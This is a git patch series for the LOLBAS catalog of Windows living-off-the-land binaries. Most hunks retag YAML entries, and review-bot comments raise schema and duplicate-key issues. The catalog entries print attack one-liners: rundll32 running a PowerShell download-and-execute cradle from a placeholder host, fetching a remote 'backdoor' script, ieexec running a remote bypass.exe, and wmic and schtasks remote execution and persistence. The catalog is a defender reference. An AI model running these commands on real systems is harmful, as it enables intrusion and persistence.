 workflows: ["PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks"]
 types: [completed]
From 0935d63fa187dc3bbbe7b4edb74fe6949a92d679 Mon Sep 17 00:00:00 2001
From: Hegusung
Date: Sun, 13 Oct 2024 23:12:17 +0200
Subject: [PATCH 145/148] Revert "Update gh-pages.yml" This reverts commit 8715370aa8663be2c0964b256ac6797109a31872.
---
 .github/workflows/gh-pages.yml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml
index b053a7c1..c9ce872f 100644
--- a/.github/workflows/gh-pages.yml
+++ b/.github/workflows/gh-pages.yml
@@ -1,5 +1,5 @@
 ---
-name: Update LOLBAS-Project-hegusung.github.io
+name: Update LOLBAS-Project.github.io
 on:
 workflow_run:
 workflows: ["PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks"]
@@ -21,11 +21,11 @@ jobs:
 mv yml/OSScripts yml/Scripts
 rm -r yml/HonorableMentions
- - name: Deploy to LOLBAS-Project-hegusung.github.io repo
+ - name: Deploy to LOLBAS-Project.github.io repo
 uses: peaceiris/actions-gh-pages@v3
 with:
 deploy_key: ${{ secrets.ACTIONS_DEPLOY_KEY }}
- external_repository: hegusung/LOLBAS-Project-hegusung.github.io
+ external_repository: LOLBAS-Project/LOLBAS-Project.github.io
 publish_branch: master
 publish_dir: yml
 destination_dir: _lolbas
From b1fb82ad1156e53dec52ca0cbd1d32feed926ca3 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Mon, 14 Oct 2024 19:10:35 +0200
Subject: [PATCH 146/148] Update Dfshim.yml: Typo
---
 yml/OSLibraries/Dfshim.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml
index 6f76b896..3796255a 100644
--- a/yml/OSLibraries/Dfshim.yml
+++ b/yml/OSLibraries/Dfshim.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1127
 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: ClickOne
+ - Execute: ClickOnce
 - Execute: Remote
 Full_Path:
 - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
From 089614e6a9978794dac3f89c9ab108895909d204 Mon Sep 17 00:00:00 2001
From: Wietze
Date: Wed, 20 Nov 2024 23:08:37 +0000
Subject: [PATCH 147/148] Various changes to Execute tags
---
 yml/OSBinaries/Addinutil.yml | 2 +-
 yml/OSBinaries/At.yml | 2 +-
 yml/OSBinaries/Cmstp.yml | 1 +
 yml/OSBinaries/Conhost.yml | 4 ++--
 yml/OSBinaries/Eventvwr.yml | 2 ++
 yml/OSBinaries/Hh.yml | 7 +++---
 yml/OSBinaries/Ieexec.yml | 4 ++--
 yml/OSBinaries/Installutil.yml | 8 +++----
 yml/OSBinaries/Jsc.yml | 4 ++--
 .../Microsoft.Workflow.Compiler.yml | 6 ++---
 yml/OSBinaries/Mmc.yml | 4 +++-
 yml/OSBinaries/Msbuild.yml | 6 ++---
 yml/OSBinaries/Msiexec.yml | 2 ++
 yml/OSBinaries/Regasm.yml | 4 ++--
 yml/OSBinaries/Regsvcs.yml | 4 ++--
 yml/OSBinaries/Rundll32.yml | 22 ++-----------------
 yml/OSBinaries/Runscripthelper.yml | 2 +-
 yml/OSBinaries/Schtasks.yml | 4 ++--
 yml/OSBinaries/SettingSyncHost.yml | 2 +-
 yml/OSBinaries/Ssh.yml | 4 ++--
 yml/OSBinaries/Syncappvpublishingserver.yml | 2 +-
 yml/OSBinaries/Verclsid.yml | 2 +-
 yml/OSBinaries/Wmic.yml | 4 ++--
 yml/OSBinaries/Xwizard.yml | 4 ++--
 yml/OSBinaries/msedgewebview2.yml | 6 ++---
 yml/OSBinaries/wt.yml | 2 +-
 yml/OSLibraries/Ieframe.yml | 2 +-
 yml/OSLibraries/Shdocvw.yml | 2 +-
 yml/OSLibraries/Url.yml | 2 +-
 yml/OSScripts/CL_LoadAssembly.yml | 2 +-
 yml/OSScripts/CL_mutexverifiers.yml | 2 +-
 yml/OSScripts/Cl_invocation.yml | 1 -
 yml/OSScripts/Syncappvpublishingserver.yml | 2 +-
 yml/OSScripts/UtilityFunctions.yml | 2 +-
 yml/OSScripts/Winrm.yml | 3 +--
 yml/OtherMSBinaries/AccCheckConsole.yml | 4 ++--
 yml/OtherMSBinaries/Agentexecutor.yml | 2 +-
 yml/OtherMSBinaries/Csi.yml | 2 +-
 yml/OtherMSBinaries/DefaultPack.yml | 2 +-
 yml/OtherMSBinaries/Devtoolslauncher.yml | 4 ++--
 yml/OtherMSBinaries/Dnx.yml | 2 +-
 yml/OtherMSBinaries/Dotnet.yml | 8 +++----
 yml/OtherMSBinaries/Fsi.yml | 4 ++--
 yml/OtherMSBinaries/FsiAnyCpu.yml | 4 ++--
 yml/OtherMSBinaries/Rcsi.yml | 4 ++--
 yml/OtherMSBinaries/Sqlps.yml | 2 +-
 yml/OtherMSBinaries/Sqltoolsps.yml | 2 +-
 yml/OtherMSBinaries/Teams.yml | 4 ++--
 yml/OtherMSBinaries/Update.yml | 4 ++--
 yml/OtherMSBinaries/VSDiagnostics.yml | 2 +-
 yml/OtherMSBinaries/Wfc.yml | 2 +-
 yml/OtherMSBinaries/Wsl.yml | 2 +-
 52 files changed, 86 insertions(+), 100 deletions(-)
diff --git a/yml/OSBinaries/Addinutil.yml b/yml/OSBinaries/Addinutil.yml
index 7ff31457..25564765 100644
--- a/yml/OSBinaries/Addinutil.yml
+++ b/yml/OSBinaries/Addinutil.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1218
 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: .NetObjets
+ - Execute: .NetObjects
 Full_Path:
 - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
 - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe
diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml
index 12397727..80c5faaf 100644
--- a/yml/OSBinaries/At.yml
+++ b/yml/OSBinaries/At.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1053.002
 OperatingSystem: Windows 7 or older
 Tags:
- - Execute: EXE
+ - Execute: CMD
 Full_Path:
 - Path: C:\WINDOWS\System32\At.exe
 - Path: C:\WINDOWS\SysWOW64\At.exe
diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml
index bccde852..5bd76aac 100644
--- a/yml/OSBinaries/Cmstp.yml
+++ b/yml/OSBinaries/Cmstp.yml
@@ -22,6 +22,7 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Tags:
 - Execute: INF
+ - Execute: Remote
 Full_Path:
 - Path: C:\Windows\System32\cmstp.exe
 - Path: C:\Windows\SysWOW64\cmstp.exe
diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml
index 3dca837f..cd076da4 100644
--- a/yml/OSBinaries/Conhost.yml
+++ b/yml/OSBinaries/Conhost.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1202
 OperatingSystem: Windows 10, Windows 11
 Tags:
- - Execute: EXE
+ - Execute: CMD
 - Command: "conhost.exe --headless calc.exe"
 Description: Execute calc.exe with conhost.exe as parent process
 Usecase: Specify --headless parameter to hide child process window (if applicable)
@@ -21,7 +21,7 @@ Commands:
 MitreID: T1202
 OperatingSystem: Windows 10, Windows 11
 Tags:
- - Execute: EXE
+ - Execute: CMD
 Full_Path:
 - Path: c:\windows\system32\conhost.exe
 Detection:
diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml
index e0a46a32..d8beeeae 100644
--- a/yml/OSBinaries/Eventvwr.yml
+++ b/yml/OSBinaries/Eventvwr.yml
@@ -13,6 +13,7 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Tags:
 - Application: GUI
+ - Execute: EXE
 - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
 Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
 Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
@@ -22,6 +23,7 @@ Commands:
 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
 Tags:
 - Application: GUI
+ - Execute: .NetObjects
 Full_Path:
 - Path: C:\Windows\System32\eventvwr.exe
 - Path: C:\Windows\SysWOW64\eventvwr.exe
diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml
index e861cd2b..fd09accc 100644
--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@@ -11,8 +11,9 @@ Commands:
 Privileges: User
 MitreID: T1105
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- - Command: HH.exe c:\windows\system32\calc.exe
- Description: Executes calc.exe with HTML Help.
+ Tags:
+ - Execute: EXE
+ - Application: GUI
 Usecase: Execute process with HH.exe
 Category: Execute
 Privileges: User
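Review bot: As shown, the Hh.yml hunk `@@ -11,8 +11,9 @@` removes `- Command: HH.exe c:\windows\system32\calc.exe` and its `Description:` but keeps the `Usecase:`, `Category:` and `Privileges:` lines that followed, so on the new side those keys recur inside the preceding entry (duplicate mapping keys, which yamllint rejects and most loaders resolve silently to the last value) and the calc.exe command vanishes from the catalog; the hunk's line counts (8 old, 9 new) confirm no replacement `- Command:` line is added. The second Hh.yml hunk `@@ -20,7 +21,7 @@` on the next line has the same shape, swapping `- Command: HH.exe http://some.url/payload.chm` for `- Application: GUI`. Presumably the intent was to append a `Tags:` block to each entry, i.e. keep both `- Command:` lines and insert `Tags:` / `- Execute: EXE` / `- Application: GUI` after each entry's `OperatingSystem:` line; a schema-validation run on the new file should catch the duplicate keys if this is wrong. Both entries continue outside the hunks.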
@@ -20,7 +21,7 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
 - Execute: EXE
- - Command: HH.exe http://some.url/payload.chm
+ - Application: GUI
 Description: Executes a remote payload.chm file which can contain commands.
 Usecase: Execute commands with HH.exe
 Category: Execute
diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml
index 3b659dd0..f397b370 100644
--- a/yml/OSBinaries/Ieexec.yml
+++ b/yml/OSBinaries/Ieexec.yml
@@ -13,7 +13,7 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Tags:
 - Execute: Remote
- - Execute: .NetEXE
+ - Execute: EXE (.NET)
 - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
 Description: Downloads and executes bypass.exe from the remote server.
 Usecase: Download and run attacker code from remote location
@@ -23,7 +23,7 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Tags:
 - Execute: Remote
- - Execute: .NetEXE
+ - Execute: EXE (.NET)
 Full_Path:
 - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
 - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml
index 8a070107..c9f29fe2 100644
--- a/yml/OSBinaries/Installutil.yml
+++ b/yml/OSBinaries/Installutil.yml
@@ -12,8 +12,8 @@ Commands:
 MitreID: T1218.004
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: .NetDLL
- - Execute: .NetEXE
+ - Execute: DLL (.NET)
+ - Execute: EXE (.NET)
 - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
 Description: Execute the target .NET DLL or EXE.
 Usecase: Use to execute code and bypass application whitelisting
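Review bot: The tag values `EXE (.NET)` and `DLL (.NET)` introduced in the Ieexec.yml and Installutil.yml hunks (and `XOML`, `XSL`, `COM`, `MSI`, `MST`, `CSharp`, `JScript`, `PowerShell` in later hunks of this patch) are new vocabulary, yet the diffstat lists only files under `yml/` and no schema change. The repository runs a "YAML Lint and Schema Validation Checks" workflow (named on the `workflows:` line of the gh-pages hunks above); if that schema enumerates the allowed `Execute:` values, every file in this patch would fail validation, so either the schema accepts free-form strings or it needs updating in the same commit. Parentheses and spaces are legal in a plain YAML scalar, so `EXE (.NET)` itself needs no quoting.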
@@ -22,8 +22,8 @@ Commands:
 MitreID: T1218.004
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: .NetDLL
- - Execute: .NetEXE
+ - Execute: DLL (.NET)
+ - Execute: EXE (.NET)
 - Command: InstallUtil.exe https://example.com/payload
 Description: It will download a remote payload and place it in INetCache.
 Usecase: Downloads payload from remote server
diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml
index b4e71983..3a5f5a60 100644
--- a/yml/OSBinaries/Jsc.yml
+++ b/yml/OSBinaries/Jsc.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1127
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: WSH
+ - Execute: JScript
 - Command: jsc.exe /t:library Library.js
 Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
 Usecase: Compile attacker code on system. Bypass defensive counter measures.
@@ -21,7 +21,7 @@ Commands:
 MitreID: T1127
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: WSH
+ - Execute: JScript
 Full_Path:
 - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
 - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
index 5d76acaf..cd128954 100644
--- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
+++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
@@ -22,8 +22,7 @@ Commands:
 MitreID: T1127
 OperatingSystem: Windows 10S, Windows 11
 Tags:
- - Execute: VB.Net
- - Execute: Csharp
+ - Execute: XOML
 - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
 Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
 Usecase: Compile and run code
@@ -32,8 +31,7 @@ Commands:
 MitreID: T1127
 OperatingSystem: Windows 10S, Windows 11
 Tags:
- - Execute: VB.Net
- - Execute: Csharp
+ - Execute: XOML
 Full_Path:
 - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
 Code_Sample:
diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml
index 7cbe41ac..dab5e499 100644
--- a/yml/OSBinaries/Mmc.yml
+++ b/yml/OSBinaries/Mmc.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1218.014
 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
 Tags:
- - Execute: DLL
+ - Execute: COM
 - Command: mmc.exe gpedit.msc
 Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
 Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.
@@ -20,6 +20,8 @@ Commands:
 Privileges: Administrator
 MitreID: T1218.014
 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
+ Tags:
+ - Execute: DLL
 Full_Path:
 - Path: C:\Windows\System32\mmc.exe
 - Path: C:\Windows\SysWOW64\mmc.exe
diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml
index da29e92c..04ff916b 100644
--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1127.001
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: Csharp
+ - Execute: CSharp
 - Command: msbuild.exe project.csproj
 Description: Build and execute a C# project stored in the target csproj file.
 Usecase: Compile and run code
@@ -21,7 +21,7 @@ Commands:
 MitreID: T1127.001
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: Csharp
+ - Execute: CSharp
 - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
 Description: Executes generated Logger DLL file with TargetLogger export
 Usecase: Execute DLL
@@ -39,7 +39,7 @@ Commands:
 MitreID: T1127.001
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: WSH
+ - Execute: XSL
 - Command: msbuild.exe @sample.rsp
 Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
 Usecase: Bypass command-line based detections
diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml
index 92390c16..7de2d333 100644
--- a/yml/OSBinaries/Msiexec.yml
+++ b/yml/OSBinaries/Msiexec.yml
@@ -51,6 +51,8 @@ Commands:
 MitreID: T1218.007
 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
+ - Execute: MSI
+ - Execute: MST
 - Execute: Remote
 Full_Path:
 - Path: C:\Windows\System32\msiexec.exe
diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml
index 00863c97..a5314d11 100644
--- a/yml/OSBinaries/Regasm.yml
+++ b/yml/OSBinaries/Regasm.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1218.009
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: .NetDLL
+ - Execute: DLL (.NET)
 - Command: regasm.exe /U AllTheThingsx64.dll
 Description: Loads the target .DLL file and executes the UnRegisterClass function.
 Usecase: Execute code and bypass Application whitelisting
@@ -21,7 +21,7 @@ Commands:
 MitreID: T1218.009
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: .NetDLL
+ - Execute: DLL (.NET)
 Full_Path:
 - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
 - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml
index 1e6d7604..b1fde208 100644
--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1218.009
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: .NetDLL
+ - Execute: DLL (.NET)
 - Command: regsvcs.exe AllTheThingsx64.dll
 Description: Loads the target .Net DLL file and executes the RegisterClass function.
 Usecase: Execute dll file and bypass Application whitelisting
@@ -21,7 +21,7 @@ Commands:
 MitreID: T1218.009
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: .NetDLL
+ - Execute: DLL (.NET)
 Full_Path:
 - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe
 - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml
index 5d60b292..d1941d1e 100644
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@@ -22,15 +22,7 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
 - Execute: DLL
- - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
- Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
- Usecase: Execute code from Internet
- Category: Execute
- Privileges: User
- MitreID: T1218.011
- OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Tags:
- - Execute: JScript
+ - Execute: Remote
 - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
 Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
 Usecase: Proxy execution
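Review bot: The Rundll32.yml hunk `@@ -22,15 +22,7 @@` deletes a complete command entry, and `@@ -40,15 +32,6 @@` on the next line deletes another, but the commit message only says "Various changes to Execute tags"; removing catalog entries changes what defenders can look up when building detections, so the message should record why they go (presumably as duplicates of the `javascript:` entries that remain). The `- Execute: Remote` added to the preceding entry applies to a `- Command:` line outside the hunk, so whether that entry really loads a remote DLL cannot be checked from here. The `@@ -75,8 +58,7 @@` hunk collapses `Execute: DLL` and `Execute: EXE` into `Execute: COM`, which is a reclassification the message also does not explain.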
@@ -40,15 +32,6 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
 - Execute: JScript
- - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
- Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
- Usecase: Proxy execution
- Category: Execute
- Privileges: User
- MitreID: T1218.011
- OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Tags:
- - Execute: JScript
 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
 Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
 Usecase: Execute code from Internet
@@ -75,8 +58,7 @@ Commands:
 MitreID: T1218.011
 OperatingSystem: Windows 10 (and likely previous versions), Windows 11
 Tags:
- - Execute: DLL
- - Execute: EXE
+ - Execute: COM
 Full_Path:
 - Path: C:\Windows\System32\rundll32.exe
 - Path: C:\Windows\SysWOW64\rundll32.exe
diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml
index 535aeff5..330ae0da 100644
--- a/yml/OSBinaries/Runscripthelper.yml
+++ b/yml/OSBinaries/Runscripthelper.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1218
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Tags:
- - Execute: Powershell
+ - Execute: PowerShell
 Full_Path:
 - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
 - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml
index 82f9ab2b..a938e760 100644
--- a/yml/OSBinaries/Schtasks.yml
+++ b/yml/OSBinaries/Schtasks.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1053.005
 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: EXE
+ - Execute: CMD
 - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
 Description: Create a scheduled task on a remote computer for persistence/lateral movement
 Usecase: Create a remote task to run daily relative to the the time of creation
@@ -21,7 +21,7 @@ Commands:
 MitreID: T1053.005
 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: EXE
+ - Execute: CMD
 Full_Path:
 - Path: c:\windows\system32\schtasks.exe
 - Path: c:\windows\syswow64\schtasks.exe
diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml
index 2fbd1f63..975c8316 100644
--- a/yml/OSBinaries/SettingSyncHost.yml
+++ b/yml/OSBinaries/SettingSyncHost.yml
@@ -21,7 +21,7 @@ Commands:
 MitreID: T1218
 OperatingSystem: Windows 8, Windows 8.1, Windows 10
 Tags:
- - Execute: EXE
+ - Execute: CMD
 Full_Path:
 - Path: C:\Windows\System32\SettingSyncHost.exe
 - Path: C:\Windows\SysWOW64\SettingSyncHost.exe
diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml
index 27a9f125..7b12cf3c 100644
--- a/yml/OSBinaries/Ssh.yml
+++ b/yml/OSBinaries/Ssh.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows 10 1809, Windows Server 2019
Tags:
- - Execute: EXE
+ - Execute: CMD
- Command: ssh -o ProxyCommand=calc.exe .
Description: Executes calc.exe from ssh.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion.
@@ -21,7 +21,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- - Execute: EXE
+ - Execute: CMD
Full_Path:
- Path: c:\windows\system32\OpenSSH\ssh.exe
Detection:
diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml
index 3d0cdd57..2ab7e481 100644
--- a/yml/OSBinaries/Syncappvpublishingserver.yml
+++ b/yml/OSBinaries/Syncappvpublishingserver.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
Tags:
- - Execute: Powershell
+ - Execute: PowerShell
Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml
index e42e6b74..55724dbf 100644
--- a/yml/OSBinaries/Verclsid.yml
+++ b/yml/OSBinaries/Verclsid.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1218.012
OperatingSystem: Windows 10, Windows 11
Tags:
- - Execute: DLL
+ - Execute: COM
Full_Path:
- Path: C:\Windows\System32\verclsid.exe
- Path: C:\Windows\SysWOW64\verclsid.exe
diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml
index 49d52efc..5cb953cb 100644
--- a/yml/OSBinaries/Wmic.yml
+++ b/yml/OSBinaries/Wmic.yml
@@ -21,7 +21,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- - Execute: EXE
+ - Execute: CMD
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Description: Execute evil.exe on the remote system.
Usecase: Execute binary on a remote system
@@ -30,7 +30,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- - Execute: EXE
+ - Execute: CMD
- Execute: Remote
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Description: Create a volume shadow copy of NTDS.dit that can be copied.
diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml
index e7d9b930..f7fbc3cc 100644
--- a/yml/OSBinaries/Xwizard.yml
+++ b/yml/OSBinaries/Xwizard.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- - Execute: DLL
+ - Execute: COM
- Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
Usecase: Run a com object created in registry to evade defensive counter measures
@@ -21,7 +21,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- - Execute: DLL
+ - Execute: COM
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
Usecase: Download file from Internet
diff --git a/yml/OSBinaries/msedgewebview2.yml b/yml/OSBinaries/msedgewebview2.yml
index e9ce1bd5..57a163a7 100644
--- a/yml/OSBinaries/msedgewebview2.yml
+++ b/yml/OSBinaries/msedgewebview2.yml
